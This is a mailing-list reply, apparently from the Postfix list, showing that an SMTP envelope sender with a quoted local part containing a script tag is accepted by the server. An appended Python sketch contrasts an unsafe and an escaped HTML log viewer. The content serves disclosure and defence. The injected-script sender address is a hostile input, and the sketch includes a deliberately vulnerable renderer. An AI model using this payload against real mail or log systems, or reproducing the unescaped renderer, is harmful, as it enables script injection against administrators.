@lbutlr:
> On 12/3/16 2:57 PM, Wietse Venema wrote:
> > Proof of concept:
> >
> > MAIL FROM<"<script type='text/javascript'>alert('xss');</script>"@example.com>
>
> That results in "501 5.5.4 Syntax: MAIL FROM:<address>"

OK, so insert the missing ':'

MAIL FROM:"<script type='text/javascript'>alert('xss');</script>"@example.com>
250 2.1.0 Ok

Instead of an alert, a real attacker would provide more nefarious code.
This code runs without the user even having to click a link.

	Wietse
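
Added example, not part of the original thread: RFC 5321 allows '<', '>' and quote characters inside a quoted local part, so the address above is valid and the defence belongs where it is written into HTML. The sketch below assumes the sender ends up in a web-based log viewer; the log line format and the function names are assumptions made for illustration.

```python
import html
import re

# Constructed log line (format is an assumption): the envelope sender from
# the proof of concept, accepted by the server with "250 2.1.0 Ok".
SAMPLE_LOG = (
    "Dec  3 15:02:11 mx postfix/qmgr[1234]: 4F1A2C0D1E: from=<\"<script "
    "type='text/javascript'>alert('xss');</script>\"@example.com>, "
    "size=512, nrcpt=1 (queue active)"
)

# Greedy match: the quoted local part may itself contain '<' and '>'.
FROM_RE = re.compile(r"from=<(.*)>, size=")


def extract_sender(line):
    """Return the envelope sender from a log line, or None."""
    m = FROM_RE.search(line)
    return m.group(1) if m else None


def render_row_unsafe(sender):
    """Vulnerable: attacker-controlled text is pasted into markup as-is."""
    return "<tr><td>" + sender + "</td></tr>"


def render_row_safe(sender):
    """Hardened: escape &, <, >, and both quote characters at output time."""
    return "<tr><td>" + html.escape(sender, quote=True) + "</td></tr>"


if __name__ == "__main__":
    s = extract_sender(SAMPLE_LOG)
    print(render_row_unsafe(s))  # contains a live <script> element
    print(render_row_safe(s))    # same text, rendered inert
```

The escaped row still displays the sender exactly as it was received, which keeps the log useful for investigation while the browser treats it as text.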